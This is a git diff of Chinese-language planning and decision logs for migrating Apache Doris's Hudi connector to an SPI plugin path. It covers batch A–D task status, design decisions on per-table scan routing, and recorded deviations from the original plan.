[D-020];核心拆解 **M1 身份消费 ⊥ M2 scan 路由**;细化 D-005;同步 tasks/P3(T08 ✅ + 阶段日志)+ PROGRESS(§一/§二/§三/§四/§六/§七)+ decisions-log(D-020)+ connectors/hudi + 设计备忘 P3-T08 + HANDOFF;研究输入 `research/spi-multi-format-hms-catalog-analysis.md` 一并纳入 git 跟踪(design 引用,避免悬空) +- **下一个 session 应做**(**P3 hybrid in-scope 批 A–D 完成,PR #64143 已开**):监控 [PR #64143](https://github.com/apache/doris/pull/64143) CI / 处理 review;待合入后 **批 E 并入 P7**(live cutover,不在 P3 编码)或启 **P4**(maxcompute)。**P3 内不要碰 `SPI_READY_TYPES` / fe-core 消费实现 / legacy / 非 hudi 连接器(皆批 E)** +- **是否需要 handoff**:**是**——本场已 rewrite [HANDOFF.md](./HANDOFF.md)(P3 批 A–D 完成总结 + D-020/M1⊥M2 认知 + 批 E/PR/P4 三选项 + 沿用坑) - **协作规范**:[AGENT-PLAYBOOK.md](./AGENT-PLAYBOOK.md)(context 预算、subagent 使用、handoff 触发条件) --- diff --git a/plan-doc/connectors/hudi.md b/plan-doc/connectors/hudi.md index 5ab858a39cf5b0..603dba5e78d5f1 100644 --- a/plan-doc/connectors/hudi.md +++ b/plan-doc/connectors/hudi.md @@ -11,8 +11,8 @@ | **fe-core 旧路径** | `fe/fe-core/src/main/java/org/apache/doris/datasource/hudi/` | | **共享依赖** | `fe-connector-hms`(通过 HMS 拿元数据) | | **计划迁移阶段** | **P3** | -| **当前状态** | ⏸ 未启动 | -| **完成度** | 20% | +| **当前状态** | 🚧 dormant 硬化中(批 A–C;gate 关、零 live 风险)| +| **完成度** | 25% | | **主 owner** | TBD | --- @@ -31,7 +31,7 @@ | 8-9 | 🚫 | hudi 无独立 catalog;走 D-005 的 `tableFormatType` 模型 | | 10 | ⏳ | 替换 `visitPhysicalHudiScan` 中 `HMSExternalTable.dlaType=HUDI` 检查 | | 11 | ⏳ | 删 `HudiScanNode`,由 `PluginDrivenScanNode` + `HudiScanPlanProvider` 承接 | -| 12 | ⏳ | 0 个测试 | +| 12 | 🟡 | 批 C/T07:三连接器模块测试基线 59 测(hudi 33 + hms 12 + hive 14;含 COW/MOR schema golden parity);端到端/集群验证随批 E cutover | | 13 | ⏳ | 删 `datasource/hudi/` | --- @@ -44,12 +44,12 @@ | E2 Procedures | 🟡 | hudi 有 `archive_log` 等 procedure | 后续可考虑 | | E3 MetaInvalidator | 🟡 | 通过 HMS event 同步 | 复用 `fe-connector-hms` 的 invalidator | | E4 Transactions | 🟡 | hudi 有 timeline | 暂用 no-op | -| E5 MvccSnapshot | ✅ 需要 | `HudiMvccSnapshot` 待迁移到 SPI | incremental query 时序 | +| E5 MvccSnapshot | ✅ 需要 | 🟡 批 B 决策 keep default opt-out(T06/DV-007);完整 `HudiMvccSnapshot` → 批 E | 全体连接器无 override,T04 已 fail-loud time-travel;incremental query 时序入批 E | | E6 VendedCredentials | ❌ | n/a | | | E7 SysTables | ❌ | n/a | | | E8 ColumnStatistics | 🟡 | hudi 有 column stats | 后续 | | E9 Delete/Merge sink | ❌ | hudi 写路径不在本计划范围 | 与 BE 强耦合 | -| E10 listPartitions | ✅ 需要 | 走 HMS connector 的 listPartitions | | +| E10 listPartitions | ✅ 需要 | 🟡 批 B:applyFilter EQ/IN 裁剪 ✅(T05 `10b72d4`,镜像 Hive);`listPartitions*` override → 批 E(DV-007,零 live caller)| 分区裁剪经 applyFilter→prunedPartitionPaths→resolvePartitions 链路 | --- @@ -63,13 +63,14 @@ 2. 把 `HudiScanNode` 删除,由 `PluginDrivenScanNode` + 增强后的 `HudiScanPlanProvider`(已存在)承接 incremental relation 逻辑。 3. 改造 `PhysicalHudiScan` 让它走 SPI 路径。 - **P3 启动前必须 P5 paimon 或 P7 hive 进入到至少完成 hms metadata 路径**,否则 hudi 拿不到底层 HMS 表元数据。**这是依赖序的隐藏约束**——见 master plan §3.4 第一段。 +- **⚠️ 2026-06-04 recon 更正([DV-005](../deviations-log.md))**:上一条「隐藏依赖」与代码不符。HMS-over-SPI 读路径(`fe-connector-hms` 客户端库 + `HiveConnectorMetadata`(type `"hms"`) + `HudiConnectorMetadata`(type `"hudi"`) + `ConnectorTableSchema.tableFormatType` 区分符)**早已存在但 dormant**(`CatalogFactory.SPI_READY_TYPES` 不含 hms/hudi,零 live caller)。**真正阻塞是 catalog 模型错配**:现存连接器是独立 `"hudi"` catalog type,而 Doris 真实模型是 hudi 寄生在 `"hms"` catalog 内、以 `DLAType.HUDI` 暴露,且 fe-core 不消费 `tableFormatType`。P3 改为:先 recon scan/split 路径 + 写 catalog 模型决策备忘(a/b;c 否决)→ 用户签字 → 编码。详见 [HANDOFF](../HANDOFF.md) 关键认知 1。 --- ## 关联 - 阶段 task:P3(待启动时建) -- 决策:D-005(DLA 模型方案 A) +- 决策:D-005(DLA 区分符方案 A)、D-020(多格式 scan 路由=方案 B per-table SPI provider,细化 D-005;T08 设计) - 偏差:(暂无) - 风险:(暂无独立的) @@ -77,5 +78,23 @@ ## 进度日志 +### 2026-06-05(批 D) +- **P3-T08 ✅**(批 D,design-only 零代码,[D-020](../decisions-log.md),用户签字):`tableFormatType` 分流消费设计备忘。直接输入上 session recon `research/spi-multi-format-hms-catalog-analysis.md`;本场 firsthand 核读 keystone gap(`PluginDrivenExternalTable.initSchema` 只读 columns、丢 `getTableFormatType()`)。**核心拆解 M1 身份消费 ⊥ M2 scan 路由**(M1 三方案通用)。M2=**方案 B**(新增向后兼容 default `ConnectorMetadata.getScanPlanProvider(handle)`,fe-core 优先 per-table、回落 per-catalog;hms 网关按 `handle.getTableType()` 委派 Hudi/Iceberg provider),把 per-table 选 provider 升为一等 SPI 契约(满足 D-009)。**细化 D-005**(区分符沿用;"PhysicalXxxScan" 措辞早于 P1 统一,由 per-table provider seam 取代)。Iceberg-on-hms 经 SPI 依赖 P6/M3;M1+M2 实现登记批 E/P7。**批 A–D(P3 hybrid in-scope)全部完成**。设计 [`../tasks/designs/P3-T08-tableformat-dispatch-design.md`](../tasks/designs/P3-T08-tableformat-dispatch-design.md)。 + +### 2026-06-05(批 C) +- **P3-T07 ✅**(批 C,测试 + gap-1 修,[DV-008](../deviations-log.md),用户签字):三模块测试基线 + COW/MOR schema parity。feasibility = **golden-value**(fe-core 不依赖具体连接器模块,无跨模块编译路径);关键结论 **COW/MOR schema type-agnostic**(两侧 schema 推导都不按表型分支,差异只在 scan planning)。**hudi** `avroSchemaToColumns` 顶层列名 `toLowerCase` 修(gap-1,镜像 legacy `HMSExternalTable:745`)+ package-private static 可测;`HudiTypeMappingTest` 补 `fromAvroSchema` golden(原零覆盖);新 `HudiSchemaParityTest`(列名/序/类型/Hive 串/casing 边界)+ `HudiTableTypeTest`(COW/MOR/UNKNOWN)。**hms** 新 `HmsTypeMappingTest`(共享 Hive 类型串解析器,原零测试)。**hive** 新 `HiveFileFormatTest` + `HiveConnectorMetadataPartitionPruningTest`(镜像 T05 裁剪网)。三模块 59 测全绿(hudi 33 + hms 12 + hive 14);checkstyle 0;import-gate 通过;gate 保持关闭。gap-2 Hudi meta-field 纳入(`getTableAvroSchema(true)` vs 无参)推迟批 E。设计 [`../tasks/designs/P3-T07-test-baseline-design.md`](../tasks/designs/P3-T07-test-baseline-design.md)。 + +### 2026-06-05(批 B) +- **P3-T05 ✅**(批 B,commit `10b72d4`):`HudiConnectorMetadata.applyFilter` 真实 EQ/IN 分区裁剪。原占位实现列**全部** HMS 分区不裁剪、且无条件设 `prunedPartitionPaths`(静默把分区来源从 Hudi-metadata 切到 HMS);重写为忠实镜像 `HiveConnectorMetadata`(抽取 partition 列 EQ/IN 谓词→列候选→裁剪→仅有效果时回传 pruned handle,否则 `Optional.empty()` 回落 Hudi-metadata listing)。保留 `List` 路径表示 + `-1` 上限;7 helper duplicate from Hive(仅依赖 fe-connector-hms)。`HudiPartitionPruningTest` 8 测全绿;gate 保持关闭。`listPartitions*` override 推迟批 E([DV-007](../deviations-log.md):零 live caller、Hive 不 override)。设计 [`../tasks/designs/P3-T05-partition-pruning-design.md`](../tasks/designs/P3-T05-partition-pruning-design.md)。 +- **P3-T06 ✅**(批 B 决策,零代码,[DV-007](../deviations-log.md),用户签字):MVCC/snapshot SPI 保持 default `Optional.empty()` opt-out,不新增抛异常 override(破 SPI opt-out 约定、全体连接器无 override、无 production caller=死代码、T04 已 fail-loud time-travel)。完整 MVCC 入批 E。设计 [`../tasks/designs/P3-T06-mvcc-design.md`](../tasks/designs/P3-T06-mvcc-design.md)。 + +### 2026-06-05(批 A) +- **P3-T04 ✅**(批 A,commit `feceabb`):`visitPhysicalHudiScan` SPI 分支 fail-loud——`FOR TIME/VERSION AS OF`(曾静默返最新)与增量读(曾静默全扫)抛 `AnalysisException`。dormant 分支零 live 风险;单测推迟批 E。**批 A 编码完成**(T02+T04 落地,T03→批 E)。 +- **P3-T03 🟡 推迟批 E**([DV-006](../deviations-log.md),用户签字):schema_id/history_schema_info 非批 A 可做的 SPI-surface 修复——`HudiColumnHandle` 无 field id、SPI 无 Hudi `InternalSchema` 版本、连接器无 type→`TColumnType` thrift;裸 `current==file==-1`→BE `ConstNode`(大小写敏感) 弱于现状 `by_parquet_name` 名匹配(净回归)。批 A 保持现状名匹配(零回归,common 无 evolution 可用;改名/evolution 退化非崩溃),faithful parity 入批 E。 + +### 2026-06-04 +- **P3-T02 ✅**(批 A,commit `95f23e9`):修 JNI scanner `column_types` 双 bug——(a) 发完整 Hive 类型串(新 `HudiTypeMapping.toHiveTypeString` 复刻 legacy `HudiUtils.convertAvroToHiveType`),不再用 `getTypeName()` 丢精度/子类型;(b) `HudiScanRange` typed list 端到端,弃逗号 join/split(曾打碎 `decimal(10,2)`/`struct<...>`),BE 自做 join(types `#`)。建模块首批测试 11 个全绿;gate 保持关闭。设计见 [`../tasks/designs/P3-T02-column-types-design.md`](../tasks/designs/P3-T02-column-types-design.md)。 +- P3 启动 recon(8-agent code-grounded workflow + 对抗验证)。结论([DV-005](../deviations-log.md)):HMS-over-SPI 读码已存在但 **dormant**(gate 未开、零 live caller);**真阻塞=catalog 模型错配**(独立 `"hudi"` type vs 寄生 `"hms"` 的 `DLAType.HUDI`,fe-core 不消费 `tableFormatType`)+ 增量读无 SPI 表示(P1-T04 gap)+ 三模块零测试。P3 待 catalog 模型决策(a/b;c 否决)签字后开工。关键文件锚点见 HANDOFF。 + ### 2026-05-24 - 跟踪文件建立。50% 实现已就位,但 P3 依赖 hms-connector 路径先打通(D-005 模型)。 diff --git a/plan-doc/decisions-log.md b/plan-doc/decisions-log.md index 422fac3195b5fd..a04cfff764bf4b 100644 --- a/plan-doc/decisions-log.md +++ b/plan-doc/decisions-log.md @@ -15,6 +15,8 @@ | 编号 | 别名 | 简述 | 日期 | 状态 | |---|---|---|---|---| +| D-020 | — | 单 `hms` catalog 多格式 scan 路由 = 方案 B(`ConnectorMetadata.getScanPlanProvider(handle)` per-table default);细化 D-005(design-only,实现批 E/P7)| 2026-06-05 | ✅ | +| D-019 | — | P3 hudi 采用 hybrid:现做 model-agnostic 连接器硬化+测试(behind gate),推迟 catalog 模型落地+cutover 到 hive/HMS migration | 2026-06-04 | ✅ | | D-018 | U6 | `ConnectorColumnStatistics` 用 javadoc 类型映射表 + IAE 保证类型安全 | 2026-05-24 | ✅ | | D-017 | U5 | sys-table 命名统一 `$suffix`,别名机制留待未来 | 2026-05-24 | ✅ | | D-016 | U4 | `getCredentialsForScans` 批量化,返回 `Map` | 2026-05-24 | ✅ | @@ -38,6 +40,30 @@ ## 详细记录(时间倒序) +### D-020 — 单 `hms` catalog 多格式 scan 路由 = 方案 B(per-table SPI provider) + +- **日期**:2026-06-05 +- **状态**:✅ 生效 +- **关联**:[D-005](#d-005)(被细化)、[D-009](#d-009)(default-only 约束)、[D-019](#d-019)(hybrid)、[tasks/P3 T08](./tasks/P3-hudi-migration.md)、[designs/P3-T08-tableformat-dispatch-design.md](./tasks/designs/P3-T08-tableformat-dispatch-design.md)、[research/spi-multi-format-hms-catalog-analysis.md](./research/spi-multi-format-hms-catalog-analysis.md) +- **背景**:legacy 单 `hms` catalog 靠 `HMSExternalTable.dlaType` per-table tag + 处处 `switch(dlaType)` 同时暴露 Hive/Hudi/Iceberg。SPI 侧 `ConnectorTableSchema.tableFormatType` **产而不用**——`PluginDrivenExternalTable.initSchema:79-109` 只读 columns、`Connector.getScanPlanProvider:40-42` per-catalog 单点、`HiveScanPlanProvider` 硬编码 `tableFormatType="hive"`(research §6①②③ + 本场 firsthand 核读)。T08(批 D,design-only)须定 per-table 路由 seam;研究浮现三互斥方案(A 连接器内 router / B per-table SPI provider / C fe-core 发现期分派)。 +- **决策**:M2 scan 路由采 **方案 B**——在 `ConnectorMetadata` 新增**向后兼容 default** `getScanPlanProvider(ConnectorTableHandle handle)`(默认返 null → fe-core 回落 per-catalog `Connector.getScanPlanProvider()`);fe-core `PluginDrivenScanNode.getSplits` 优先 per-table provider、回落 per-catalog;注册 `"hms"` 的连接器 override 之、按 `handle.getTableType()` 委派 Hudi/Iceberg provider。把"per-table 选 provider"升为一等 SPI 契约。配套 **M1**(fe-core 按缓存的 `tableFormatType` 做 per-table 引擎名/身份,作 opaque 串逐字上报、热路径不读)三方案通用。**design-only,实现 = 批 E/P7**。 +- **替代方案**:**A 连接器内 router**(`Connector.getScanPlanProvider()` 返回一个 `planScan` 按 `handle.getTableType()` 委派的 router)——零 SPI churn(`planScan` 已带 handle,本场核实),但路由藏进连接器、per-table 语义非一等契约;列为备选,批 E 实现期可据 iceberg 接入复杂度复核。**C fe-core 发现期分派**(fe-core 读 `tableFormatType` 建 format-specific 表对象,≈legacy DLAType→多态 DlaTable)——**否决**:fe-core 回退到 per-format 分派,违背瘦 fe-core 北极星(import-gate / D-003 / D-006)。 +- **影响**:**细化 [D-005]**——D-005 的"`tableFormatType` 区分符"结论沿用;但其"fe-core dispatch 到对应 `PhysicalXxxScan`"措辞(2026-05-24,**早于 P1 scan-node 统一**为单 `PluginDrivenScanNode` + per-range format)由 per-table provider seam 取代(SPI 路径已无 per-format `PhysicalXxxScan`)。批 E/P7 据此实现 M1+M2;新 default 方法满足 [D-009](不破签名)。Iceberg-on-hms 经 SPI 依赖 **P6** 先补 `IcebergScanPlanProvider`(M3);hms 网关引入对 `-hudi`/`-iceberg` 模块依赖边(A/B 同担)。**本场无代码改动**。 + +--- + +### D-019 — P3 hudi 采用 hybrid 推进策略 + +- **日期**:2026-06-04 +- **状态**:✅ 生效 +- **关联**:[DV-005](./deviations-log.md)、[D-005](#d-005)、[tasks/P3](./tasks/P3-hudi-migration.md)、master plan §3.4/§3.8 +- **背景**:两轮 code-grounded recon(+ 对抗验证)揭示:HMS-over-SPI 读码已存在但 dormant(gate 关、零 live caller);scan/split plumbing 正确(单 `PluginDrivenScanNode` 混合 COW-native+MOR-JNI 非问题,与 legacy 结构等价);真正阻塞是 catalog 模型错配(独立 `"hudi"` type vs 寄生 `"hms"` 的 `DLAType.HUDI`,fe-core 不消费 `tableFormatType`)+ 关闭的 gate;另有一批**与模型无关**的 SPI-surface 正确性缺口(`schema_id`/`history_schema_info` 缺、`column_types` 双 bug、time-travel 静默返最新、增量读无表示、partition 裁剪缺、三模块零测试)。 +- **决策**:P3 走 **hybrid**。**现在做 (b)**(批 A–D,全部 behind 关闭的 gate,零 live-path 风险):hudi 连接器 model-agnostic 正确性修复 + metadata 补全 + 测试基线 + 模型 dispatch 设计(design-only)。**推迟 (a)**(批 E,登记不编码):fe-core 消费 `tableFormatType` 的 per-table 分流、gate flip(`SPI_READY_TYPES` 加 hms/hudi)、live cutover、删 legacy `datasource/hudi/`、完整增量/time-travel、集群/runtime 验证 —— 并入一个 properly-scoped hive/HMS migration(P7 或专门子阶段)。 +- **替代方案**:(a) **hms-first 一次到位** —— 否决为 P3 首交付(把 P7 范围拉进 P3、re-route live 重度使用的 HMS 路径、零测试网,回归风险大);(c) **直接 flip gate** —— 早已否决(模型错配下 `"hudi"` provider 不可达 + 高回归)。 +- **影响**:P3(hybrid)**不交付用户可见行为变化**(hudi 仍走 legacy,gate 不翻);产出是连接器硬化 + 测试网 + 设计。批 A–C 验证为单测/设计级,端到端/集群验证随批 E cutover。tasks/P3 据此划批。 + +--- + ### D-018 — `ConnectorColumnStatistics` 类型安全契约(原 U6) - **日期**:2026-05-24 diff --git a/plan-doc/deviations-log.md b/plan-doc/deviations-log.md index 53328d2d247d0c..120465c4142fae 100644 --- a/plan-doc/deviations-log.md +++ b/plan-doc/deviations-log.md @@ -13,10 +13,13 @@ ## 📋 索引 -> 时间倒序;当前共 **4** 项。 +> 时间倒序;当前共 **7** 项。 | 编号 | 偏差主题 | 原计划位置 | 日期 | 当前状态 | |---|---|---|---|---| +| DV-007 | P3 批 B scope 校正:T05 `listPartitions*` override 推迟批 E(零 live caller、Hive 不 override);T06 MVCC 保持 default opt-out(非抛异常 override)| [HANDOFF 未完成 #1/#2](./HANDOFF.md) / [tasks/P3 T05/T06](./tasks/P3-hudi-migration.md) | 2026-06-05 | 🟢 已修正(T05 裁剪已落地;list*/MVCC 入批 E)| +| DV-006 | P3-T03 schema_id/history 非批 A 可修(连接器缺 field-id/InternalSchema/type→thrift;裸基线会回归);推迟批 E | [HANDOFF 1b ①](./HANDOFF.md) / [tasks/P3 T03](./tasks/P3-hudi-migration.md) | 2026-06-05 | 🟡 推迟(批 E)| +| DV-005 | P3 hudi「HMS-over-SPI 前置依赖」与代码不符;真阻塞=catalog 模型错配 | [connectors/hudi.md](./connectors/hudi.md) / [master plan §3.4](./00-connector-migration-master-plan.md) / D-005 | 2026-06-04 | 🟡 待修正(P3 模型决策)| | DV-004 | T13 用户向安装文档不在本代码仓(在 doris-website 仓) | [tasks/P2 T13](./tasks/P2-trino-connector-migration.md) | 2026-06-04 | 🟢 已修正 | | DV-003 | T12 回归测试引用不存在的先例/目录且本地不可运行 | [tasks/P2 T12](./tasks/P2-trino-connector-migration.md) | 2026-06-04 | 🟡 推迟 | | DV-002 | T11 无法 mock Trino plugin;JsonSerializer 非纯单元 | [tasks/P2 T11](./tasks/P2-trino-connector-migration.md) | 2026-06-04 | 🟢 已修正 | @@ -26,6 +29,109 @@ ## 详细记录(时间倒序) +### DV-008 — P3-T07 parity 暴露两处 SPI↔legacy 偏差:列名 casing 当场修;Hudi meta-field 纳入推迟批 E + +- **发现日期**:2026-06-05 +- **发现 session / agent**:P3 批 C session(T07 启动前 5-agent code-grounded recon workflow `p3-t07-recon`:cow-mor / legacy-types / spi-types / hms-surface / hive-surface + 主线核读 `HudiConnectorMetadata`/`HudiTypeMapping`/`HMSExternalTable.initHudiSchema`/`ThriftHmsClient`) +- **当前状态**:🟢 已修正(gap-1 casing 已修 + 测;gap-2 meta-field 推迟批 E 实证) +- **原计划位置**:[tasks/P3 §批 C/T07](./tasks/P3-hudi-migration.md)(「parity 测试——SPI `HudiConnectorMetadata` schema/partition 输出 vs legacy `getHudiTableSchema`」)——原计划隐含假定 SPI schema 输出与 legacy parity,仅需写测试验证 +- **偏差描述**:parity recon 实证 SPI avro→column 变换与 legacy `HMSExternalTable.initHudiSchema` 有两处偏差(其余逐类型一致,见设计备忘矩阵): + 1. **gap-1 列名 casing**:SPI `HudiConnectorMetadata.avroSchemaToColumns` 用 `field.name()` 原样;legacy 在 `HMSExternalTable.java:745` `toLowerCase(Locale.ROOT)`(**仅顶层列名**;嵌套 struct 字段名两侧均不降)。mixed-case avro 列名时 SPI 保留原 case → 破 parity(BE name-match 大小写敏感,见 DV-006 / T03)。 + 2. **gap-2 Hudi meta-field 纳入**:SPI `getSchemaFromMetaClient` 调无参 `TableSchemaResolver.getTableAvroSchema()`;legacy `getHudiTableSchema:852` 调 `getTableAvroSchema(true)`。`true` 很可能强制纳入 `_hoodie_*` meta 列,无参默认随 Hudi 版本/表配置(`populateMetaFields`)变 → 可能改变列集合。无真实 metaclient 不可单测判定(同 T03 族)。 +- **触发场景**:T07 parity recon(golden-value 法,因 fe-core 只依赖 fe-connector-api/-spi、不依赖具体连接器模块,无跨模块编译路径)+ 用户 AskUserQuestion 签字(2026-06-05,「Also fix casing now」+「Focused baseline」)。 +- **新方案**: + - **gap-1 当场修**(用户签字):`avroSchemaToColumns` 顶层列名改 `toLowerCase(Locale.ROOT)`,镜像 legacy:745(仅顶层;嵌套 struct 名保持 raw,两侧一致)。已核安全:`ThriftHmsClient.convertFieldSchemas:303` 用 `fs.getName()` 不防御降字,但 Hive Metastore 自身存小写标识符 → 降 avro 路径列名与小写 HMS partition key 对齐(改善 `getColumnHandles` 匹配),无回归。`avroSchemaToColumns` 由 `private`→package-private `static`(零行为变更,使可单测)。 + - **gap-2 推迟批 E**(DV-006 同族):无真实 fixture 不可判定 + 属 schema-evolution/meta-field 机制,与 hive/HMS migration 一并实证。T07 parity 测不依赖该差异(测纯 avro→column 变换)。 + - **缩界(R12 不静默)**:`ThriftHmsClient` 源头防御性降字(与 hive 模块共享)**不在 T07 改**——触碰 hive 行为属 P7/批 E。 +- **替代方案**:(gap-1) 不修、仅 pin 现状 + 记 DV 推批 E(precedent T03/T05)——用户否决,选当场修(trivially-correct,对齐 legacy + 小写 HMS);(gap-2) 当场加 `(true)`——否决(无真实 metaclient 不可验证语义,脆测)。 +- **影响范围**: + - 文档:本条 + [tasks/P3](./tasks/P3-hudi-migration.md)(T07 ✅ + 验收 + 阶段日志)+ [PROGRESS](./PROGRESS.md)(§一/二/三/四/六/七)+ [connectors/hudi.md](./connectors/hudi.md)(概况 + playbook 12 + 进度日志)+ [HANDOFF](./HANDOFF.md)。 + - 代码:gap-1 `HudiConnectorMetadata.avroSchemaToColumns`(降字 + 可见性)+ 6 测试文件(hudi 3 改/新 + hms 1 + hive 2);gap-2 零代码。 + - 计划:批 C = {三模块测试基线 ✅, COW/MOR schema parity ✅, gap-1 casing 修 ✅};gap-2 meta-field 入批 E。 +- **关联**:P3-T07、DV-006(同族 schema-evolution 推批 E)、P3-T10/T11(批 E)、[D-019](./decisions-log.md)(hybrid)、[`designs/P3-T07-test-baseline-design.md`](./tasks/designs/P3-T07-test-baseline-design.md) +- **后续动作**: + - [x] gap-1 casing 修 + `HudiSchemaParityTest` casing pin(顶层降、嵌套 struct 名保留) + - [x] 三模块测试基线(hms `HmsTypeMappingTest` 12 / hive `HiveFileFormatTest` 6 + `HiveConnectorMetadataPartitionPruningTest` 8 / hudi `HudiTypeMappingTest`+7 + `HudiSchemaParityTest` 3 + `HudiTableTypeTest` 4 = 33 全绿) + - [ ] 批 E:gap-2 meta-field 纳入(`getTableAvroSchema(true)` vs 无参)真实 fixture 实证 + - [ ] 批 E/P7:`ThriftHmsClient` 源头防御性降字(与 hive 共享) + +### DV-007 — P3 批 B scope 校正:T05 `listPartitions*` override 推迟批 E;T06 MVCC 保持 default opt-out(非抛异常 override) + +- **发现日期**:2026-06-05 +- **发现 session / agent**:P3 批 B session(T05/T06 启动前 5-reader code-grounded recon workflow:hudi-current / hudi-resolve / hive-ref / spi-invoke / mvcc-t06 + 主线核读 `HudiConnectorMetadata`/`HiveConnectorMetadata` 全文 + grep fe-core 调用方) +- **当前状态**:🟢 已修正(T05 applyFilter EQ/IN 裁剪已落地 commit `10b72d4`;list*/MVCC 完整实现入批 E) +- **原计划位置**:[HANDOFF.md 未完成 #1/#2](./HANDOFF.md)(「T05:`listPartitions/listPartitionNames/listPartitionValues` override + 真实 applyFilter EQ/IN 分区裁剪」;「T06:大概率**显式 unsupported**(与 T04 fail-loud 一致)」)+ [tasks/P3 §T05/T06](./tasks/P3-hudi-migration.md) +- **偏差描述**:原计划把 T05 的「`listPartitions*` override」与「applyFilter 裁剪」并列为批 B 交付;并暗示 T06 应**新增抛异常的 MVCC override**。recon 实测两点前提失真: + 1. **T05 `listPartitions*` 零 live caller + Hive 不 override**:SPI `ConnectorMetadata.listPartitionNames/listPartitions/listPartitionValues` 在 fe-core **无任何调用方**——`PluginDrivenScanNode` 不调用(分区经 `applyFilter`→`prunedPartitionPaths`→`resolvePartitions` 链路);`ShowPartitionsCommand`/`HudiExternalMetaCache`/`MetadataGenerator` 调的是 **legacy** metastore 路径(`dorisTable.getRemoteName()`),非 SPI。对标 `HiveConnectorMetadata`(批 B 基准)**也不 override** 这三方法。→ 现 override = 不可测的死代码(违 R2 nothing speculative / R9 测意图)。 + 2. **T06「显式 unsupported」违 SPI opt-out 约定**:三个 MVCC 方法 default 即 `Optional.empty()`(= 不支持),`FakeConnectorPluginTest` 有显式断言;`Iceberg`/`Paimon`/`Hive`/`Trino` **全部依赖 default**,无一 override;MVCC 方法**无 production caller**(仅测试用 adapter);且 T04 已在唯一可触发点(time-travel)`visitPhysicalHudiScan` 抛 `AnalysisException`。→ 新增抛异常 override = 唯一打破约定 + 不可达死代码(违 R11 conformance / R3 surgical)。 +- **触发场景**:T05/T06 启动前 recon + grep fe-core 调用方;用户 AskUserQuestion 签字(2026-06-05,「Pruning only, defer list*」+「Keep defaults + document」)。 +- **新方案**: + - **T05** = 仅 applyFilter 真实 EQ/IN 裁剪(忠实镜像 Hive 7 步 + 7 helper,保留 `List` 路径表示与 `-1` 上限);`listPartitions*` override **推迟批 E**(届时 fe-core 长出 SPI 消费 + `SHOW PARTITIONS` 改走 SPI 时一并做)。已落地 `10b72d4`(8 单测、checkstyle 0、import-gate 通过)。 + - **T06** = **不 override,保持 default `Optional.empty()` opt-out + 文档化**(零代码);正确的 fail-loud 已在 T04 的 translator 守卫。完整 MVCC(`HudiMvccSnapshot`、snapshot 透传、增量时序)入批 E。见 [`designs/P3-T06-mvcc-design.md`](./tasks/designs/P3-T06-mvcc-design.md)。 +- **替代方案**:(T05) 现 override 三方法委托 HMS——否决(死代码、无可测意图、Hive 无先例);(T06) 新增抛异常 override——否决(破 opt-out 约定、不可达、与全体连接器分叉、T04 已覆盖)。 +- **影响范围**: + - 文档:本条 + [tasks/P3](./tasks/P3-hudi-migration.md)(T05 ✅ 裁剪 + T06 ✅ 决策 + 验收标准 + 阶段日志)+ [PROGRESS](./PROGRESS.md)(§一 P3 / §三 / §四 / §六计数)+ [connectors/hudi.md](./connectors/hudi.md)(E5/E10 + 进度日志)。 + - 代码:T05 已合入 `10b72d4`(applyFilter 裁剪 + 单测);T06 零代码。 + - 计划:批 B 范围由 {T05 裁剪+list* override, T06 throwing override} 收为 {T05 裁剪 ✅, T06 keep-defaults ✅};list*/完整 MVCC 与 T03/T09–T11 同批 E。 +- **关联**:[DV-005](#dv-005--p3-hudi-的hms-over-spi-前置依赖与代码实际状态不符真正阻塞是-catalog-模型错配)(其后续动作「listPartitions override + 真实 applyFilter 裁剪」本条落地裁剪部分)、P3-T05、P3-T06、P3-T10/T11(批 E)、[D-019](./decisions-log.md)(hybrid)、[P3-T04](./tasks/designs/P3-T04-fail-loud-design.md) +- **后续动作**: + - [x] T05 applyFilter EQ/IN 裁剪 + 单测(`10b72d4`) + - [ ] 批 E:`listPartitions*` override(fe-core SPI 消费就绪 + `SHOW PARTITIONS` 走 SPI 后) + - [ ] 批 E:完整 MVCC(`HudiMvccSnapshot` + snapshot 透传 + 增量时序),time-travel 从 T04 fail-loud 转为正确快照 + +### DV-006 — P3-T03(schema_id / history_schema_info)不是 model-agnostic 的批 A SPI-surface 修复;推迟到批 E + +- **发现日期**:2026-06-05 +- **发现 session / agent**:P3 批 A session(T03 启动前 code-grounded recon:4-reader workflow 读 SPI hook + Paimon/ES 参照 + legacy 路径 + thrift/BE 消费端;主线对 BE `table_schema_change_helper.h` 二次核读) +- **当前状态**:🟡 推迟(批 E,并入 hive/HMS migration) +- **原计划位置**:[HANDOFF.md 关键认知 1b HIGH ①](./HANDOFF.md) + [DV-005 后续动作 ①](#dv-005--p3-hudi-的hms-over-spi-前置依赖与代码实际状态不符真正阻塞是-catalog-模型错配) + [tasks/P3 §P3-T03](./tasks/P3-hudi-migration.md):「schema_id/history 缺→退化名匹配;可经现有 SPI hook `populateScanLevelParams`(Paimon/ES 已 override)+ `HudiScanRange` 设 schema_id 修复,**无需 fe-core 改动**」 +- **偏差描述**:原评估认为 ① 是「多在 SPI surface 内可修」的 model-agnostic 修复。recon 实测发现**前提不成立**: + 1. **BE 语义**(`be/src/format/table/table_schema_change_helper.h:219-267`):`history_schema_info` **unset** → `by_parquet_name`/`by_orc_name`(**鲁棒名匹配**,处理大小写 / 缺列)——**即当前 SPI hudi 路径行为**;`current_schema_id == file_schema_id` → **`ConstNode`**(`:92-121`)= **纯 identity-by-name**、**大小写敏感**、假设精确匹配(其注释自陈需注意大小写);id 不同 → `by_table_field_id`(**唯一**做 field-id / 改名 / evolution 的路径)。 + 2. **「Paimon/ES 已 override」前提失真**:二者 override `populateScanLevelParams` 是为 **predicate / docvalue**,**并不设** schema evolution 元数据(recon 实证)——**无任何 SPI 先例**发 schema_id/history。 + 3. **连接器缺料**:`HudiColumnHandle` **无 field id**(仅 `name`/`typeName` 串/`isPartitionKey`);SPI hudi 连接器**无 Hudi `InternalSchema` 版本跟踪**(legacy 走 `getCommitInstantInternalSchema`);连接器模块**无 type→`TColumnType` thrift 转换**(legacy 在 fe-core `ExternalUtil.getExternalSchema`,import gate 禁止复用)。 + 4. **裸基线会回归**:若仅设 `current==file==-1`(→ ConstNode)= identity-by-name 大小写敏感,**严格弱于**当前名匹配(丢大小写 / 缺列处理)——**净回归**;而真正的 field-id evolution 路径需上述全部缺料。 +- **触发场景**:T03 启动前 recon + 主线核读 BE `gen_table_info_node_by_field_id` / `ConstNode` / `StructNode`。 +- **新方案**:**T03 推迟到批 E**,与 hive/HMS migration 一次性建齐机制(column-handle field id + Hudi `InternalSchema` 版本 + Avro/ConnectorType→`TColumnType` thrift + `populateScanLevelParams` 设 